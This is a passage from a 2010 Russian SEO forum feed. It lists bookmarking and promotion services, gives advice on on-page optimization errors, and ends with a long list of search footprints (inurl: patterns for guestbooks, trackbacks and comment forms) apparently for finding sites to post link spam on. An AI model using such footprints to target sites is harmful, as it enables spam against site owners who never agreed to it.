помощи специальных сервисов. Я же все делаю руками и не стыжусь этого. Вот список соц. закладок, по которым я прогоняю статью после добавления на этот блог: </p> <p>wwwvaau.ru<br />wwwzakladki.yandex.ru<br />wwwmemori.ru<br />wwwmyscoop.ru<br />wwwmister-wong.ru<br />www100zakladok.ru<br />wwwlinks.i.ua<br />wwwzakladok.net<br />wwwlinkstore.ru<br />wwwweb-zakladka.ru<br />wwwvzakladki.com.ua<br />wwwbobrdobr.ru/bookmarks</p> <p>2) Кросспостинг. Пишите небольшой анонс вашей статьи (желательно, чтобы вы именно написали анонс, а не скопировали часть текста статьи) и делаем кроспостинг этого анонса во все ваши блоги на ЖЖ, Ли.ру, твиттер и прочие сервисы, в которых акаунт должен иметь КАЖДЫЙ веб мастер. Вот пример сервиса для кросспостинга – wwwpistonposter.com. Постинг не во все сервисы, однако значительно облегчит ваши мучения. </p> <p>3) Анонсирование в социальные сети. Социальных сетей существует море, как узкотематичных, так и общих. Вот примеры соц. сетей, распишу по тематикам:</p> <p>а) Seo тематика: <br />wwwgrabr.ru<br />wwwwebice.ru<br />wwwwebdigg.ru<br />wwwshowblogs.ru<br />wwwcommunity-seo.ru<br />wwwblogistica.ru – только по инвайтам<br />wwwkorica.info – только по инвайтам</p> <p>б) Общетематические: <br />wwwvott.ru<br />wwwnews2.ru</p> <p>в) IT сети:<br />wwwru.enetri.com<br />wwwprogg.ru</p> <p>г) Форумы с дайджестом:<br />wwwtalk.maulnet.ru<br />wwwarmadaboard.com<br />wwwwebmasters.ru<br />wwwbloggers.su<br />wwwmmgp.ru<br />wwwmake4you.net</p> <p>4) Сервисы e-mail рассылок. После добавления поста обязательно (если вы ведете e-mail рассылку) добавлять анонсы и в них! Вот где делаю рассылки я:<br />wwwsubscribe.ru<br />wwwcontent.mail.ru<br />wwwmaillist.ru</p> <p>5) Анонсы в сервисы микроблоггинга: <br />wwwtwitter.com<br />wwwtumblr.com<br />wwwfriendfeed.com<br />wwwmy.ya.ru<br />wwwzizl.ru</p> <p>6) Ну и вот напоследок вам парочка прочих сервисов, в которых можно, а даже нужно делать закладки: <br />wwwdigg.com<br />wwwmixx.com<br />wwwreddit.com</p> <p>Вот и все! Парочка не сложных действий и ваша статья быстро проиндексируется, а так же о ней узнают люди! Удачи!</p> mybb@mybb.ru (reaktor) Sun, 23 May 2010 19:39:00 +0400 http://realseo.mybb.forum/viewtopic.php?pid=15#p15 http://realseo.mybb.forum/viewtopic.php?pid=14#p14 <p>По выводу недели общения на форумах и прочих “порно” ресурсах, где обсуждают seo и “срут” друг другу на головы решил написать вот этот пост, в котором выявлю все, ну или практически все ошибки начинающих веб-мастеров во внутренней оптимизации. Не буду писать огромное вступление, дабы сам люблю короткие и четкие посты, которые отражают всю тему сразу без “воды”.</p> <p>1) Первая ошибка начинающего веб-мастера во внутренней оптимизации – это не правильное, а если точнее, то заспамленное написание тега title. Отсюда и первая ошибка. В теге титл желательно употреблять лишь одно точное вхождение ключевого запроса. Если же вы хотите повторить этот запрос, то сделайте это в виде синонима и в виде разбавки некоторыми другими словами. Это, в конце концов, прибавит естественности и читабельности заголовку. </p> <p>2) При составлении заголовка рассчитывать стоит не только на оптимизацию по ключевикам, но и на красоту написания. Составление читабельного и завлекающего заголовка, поможет захватить больше аудитории. Согласитесь, что из простого банального заголовка и заголовка с правильно составленным акцентрированием внимания шанс у второго на 50% больше заполучить посетителя нежели, чем у первого. Составление не читабельного заголовка – это грубая ошибка.</p> <p>3) Не правильное структурирование текстов. Не правильно структурирование текстов приводит к плохому ранжированию. Что значит не правильное структурирование? Неправильное использование тегов h1-h6. На странице должен быть только один тег h1. Страница должна быть структурирована в виде:</p> <p>Тег h1<br />Текст<br />Тег h2<br />Текст<br />Тег h3<br />Текст<br />Тег h4<br />Текст </p> <p>Вот это самое главное! Используя, эти теги заголовков, вы должны составлять как бы иерархическую систему текста и ни в коем случае нельзя употреблять вид</p> <p>Тег h2<br />Текст <br />Тег h1 <br />Текст<br />Тег h3<br />Текст<br />Тег h6<br />Текст</p> <p>Это одна из самых распространенных ошибок. Не делайте этого ни в коем случае. Придерживайтесь стандартов, это улучшит, как оптимизацию текста, так и простоту чтения.</p> <p>4) Использование тега h1 ссылкой. Ни в коем случае нельзя ставить ссылку на тег h1 – это сразу ще “палится” поисковиками – очень распространенная ошибка. </p> <p>5) Прочие теги внутри тега h1. Нельзя вставлять теги внутри тега h1. Этот тег должен содержать исключительно текст.</p> <p>6) Переоптимизация текста. Не стоит напихивать текст ключевыми словами. Думаю, что таких кто этим увлекается больше не осталось, но дабы предостеречь вас и есть этот пункт.</p> <p>7) Используйте слова рационально. Не повторяйте одно и то же слово, когда пишите статьи. Старайтесь использовать его синонимы. Тофтология и какие либо её задатки не приведут к хорошей читаемости текста, как и не приведут к хорошей оптимизации.</p> <p> Используя ключевые слова в тексте, вы выделяете их в тег strong. Да это нужно, но в разумных количествах. Мои результаты и убеждения привели к тому, что одного выделения одного ключевого слова тегом стронг вполне достаточно. Если же вы оптимизируете под 2 ил 3 запроса, то у вас получится 2 или 3 выделения тегом strong соответственно.</p> <p>9) Использование подчеркнутого текста. Не советую выделять этим тегом текст вообще! Как правильно подчеркнутый тест ассоциируется со ссылкой, что может привести в заблуждение вашего читателя.</p> <p>10) Использование мелкого или же невидимого текста. Это уже пахнет черным seo – хотя там это уже и не используют. Однако не советовал бы это делать, дабы это на ура “палится” поисковиками.</p> <p>11) Дублирование заголовков. Встречал такую ошибку и в свое время её допускал. В чем собственно ошибка? Как вы уже догадались из названия “дублирование заголовков”. Когда на каком либо сайте/блоге создается запись, то там есть обязательно поле заголовок (где как). Там вы пишите заголовок вашей статьи и уже непосредственно при написании статьи дублируете её название в теге h1. Это крайне не верно, нельзя так делать! Постарайтесь избежать этого и составляйте разные заголовки. </p> <p>12) Составление не человекоподобных урлов. Одна из важных ошибок, когда страницы вашего сайта имеют вид: <a href="http://optimization-seo.ru/?p=1" rel="nofollow" target="_blank">http://optimization-seo.ru/?p=1</a><br />или что-то подобное! Крайне распространенная ошибка. Человекоподобные урлы лучше индексируются, а так же могут содержать ключевые слова, которые положительно повлияют на ранжирование вашего сайта. </p> <p>13) Если вы ведете блог ни в коем случае не делайте топ комментаторов на главной. Это позволит этим ТОП комментаторам получить с вашего блога сквозную ссылку, что крайне негативно может повлиять на ваши параметры. </p> <p>14) При вставлении картинок в ваши посты обязательно указывать тег alt с ключевыми, продвигаемыми словами. Многие забывают это делать.</p> <p>Думаю одни из самых распространенных я указал, далее решать вам! Удачи!</p> mybb@mybb.ru (reaktor) Sun, 23 May 2010 19:36:35 +0400 http://realseo.mybb.forum/viewtopic.php?pid=14#p14 http://realseo.mybb.forum/viewtopic.php?pid=13#p13 <p>inurl:bbs.cgi <br />inurl:fantasy.cgi <br />inurl:apeboard_plus.cgi <br />inurl:aska.cgi <br />inurl:clever.cgi <br />inurl:gamebbs.cgi <br />inurl:light.cgi <br />inurl:glight.cgi <br />inurl:honey.cgi <br />inurl:joyful.cgi <br />inurl:mimic2.cgi <br />inurl:minibbs.cgi <br />inurl:petit.cgi <br />inurl:rbook.cgi <br />inurl:resbbs.cgi <br />iunrl:stlfbbs.cgi <br />inurl:yybbs.cgi <br />inurl:custombbs.cgi <br />inurl:ibbsm.cgi <br />inurl:imgbbs.cgi <br />inurl:imodebbs.cgi <br />inurl:korobbs.cgi <br />inurl:lounge.cgi <br />inurl:mkakikomitai.cgi <br />inurl:pppbbs.cgi <br />inurl:purybbs.cgi <br />inurl:q-board.cgi <br />inurl:talkbbs.cgi <br />inurl:upb.cgi <br />inurl:updown.cgi <br />inurl:msgbrd.cgi <br />/trackback/ <br />/trackback.php/ <br />?action=plugin&amp;name=TrackBack&amp;tb_id= <br />/tbinterface.php/ <br />/tb/ <br />/Trackback,guid, <br />/cgi-bin/mt/mtb.cgi/ <br />/mt-tb.cgi/ <br />/tb/tb.aspx/ <br />/tbping <br />/tb.php?id= <br />/trackback.php/ <br />/_trackback/ <br />/wp-trackback.php? <br />/TBInterface/ <br />sharp.cgi <br />register.cgi <br />guestbook.asp <br />light.cgi <br />yybbs.cgi <br />inurl:bbs.cgi <br />skbbs.cgi <br />stlfbbs.cgi <br />berry.cgi <br />guestbook/sign.php <br />gbook.php?a=sign <br />guestbook/sign.asp <br />yapgb.php?action=sign <br />guestbook.php?act=new <br />aska.cgi <br />dcguest.cgi <br />wbbook/index.php <br />addentry.php <br />guestbook.php?action=add <br />slime.cgi <br />ibbsf2.cgi <br />upb.cgi <br />coolzup.cgi <br />nextbbs.cgi <br />board.cgi <br />pldbbs.cgi <br />gk.htm <br />node <br />gjestebok.htm <br />index.php?inputmask=0 <br />blog_comment.asp?blog_id= <br />guestbook_sign.php <br />gform.asp <br />guestbook.php?offset= <br />noutenki <br />guestbook/message.php?page=new <br />dcguest.cgi?action=add_form <br />gaestebuch.php?user= <br />guestbook.asp?action=sign <br />add_comment.asp?ID <br />AddGuestBookEntry.asp <br />guestbook.cgi?action=add <br />guestbook/add.asp <br />gb/sign.asp <br />add.php?sid=0 <br />gaestebuch.php?action=entry <br />gbook.php?a=sign <br />index.php?guestbook_page=1 <br />guestbook.php?act=new <br />gbs/sign.php <br />index.php?inputmask=0 <br />guestbook.php?row_start= <br />Question.asp?GID= <br />guestbook.cgi?start= <br />apeboard_plus.cgi <br />gbook.pl <br />gbook.asp <br />gbook.html <br />gb.php <br />guestbook.php <br />guestbook.asp <br />guestbook.html <br />blog <br />DancerDish_post.htm <br />post_message.asp?fid= <br />sign.asp?PagePosition= <br />board.cgi?action=showmsg&amp;num= <br />bbs_post.asp <br />gb.asp?action=sign <br />post.jsp?forum= <br />guestbook.php?rowstart <br />gbook/add-sign.php? <br />POST ARTICLE <br />submit.html <br />&amp;part=1 <br />index.php?p= <br />post.htm <br />Guestbook.php?displayBegin <br />mde.asp?id= <br />html&amp;mode=reply <br />guestbook.php?action=Sign <br />guestbook <br />post a comments <br />comments <br />sign guestbook <br />sign the guestbook <br />view the guestbook <br />view guestbook <br />sing up <br />submit comment <br />submit <br />guest <br />submit comment <br />add guestbook <br />leave a reply <br />leave a comment <br />comment plugger <br />add message <br />send message <br />send comment <br />send <br />comment <br />preview <br />preview comments <br />preview comment <br />submit your comments <br />view entry <br />submit entry <br />back to guestbook <br />action wiki <br />wiki <br />Add site <br />Add a site <br />Add URL <br />Add a URL <br />Ads <br />Advertiser Testimonials <br />Article <br />Articles <br />Blog <br />Blogs <br />Buy Links <br />Directory <br />Directories <br />Donate <br />Donation <br />Donations <br />Ezine <br />Ezine Ads <br />Links <br />Merchants <br />Newsletter <br />Newsletter Ads <br />Rent Links <br />Resources <br />Related sites <br />Related urls <br />Sites <br />Sponsors <br />Sponsorship <br />Submit a link <br />Submit a site <br />Submit URL <br />Submit an URL <br />Suggest a link <br />Suggest a site <br />Suggest URL <br />Suggest an URL <br />Thanks to Our Sponsors <br />Tips <br />Vendors <br />Weblog <br />allinurl:&quot;ugb.cgi?action=addentry&quot; <br />allinurl:&quot;g.php?user&quot;....</p> mybb@mybb.ru (reaktor) Sun, 23 May 2010 19:09:44 +0400 http://realseo.mybb.forum/viewtopic.php?pid=13#p13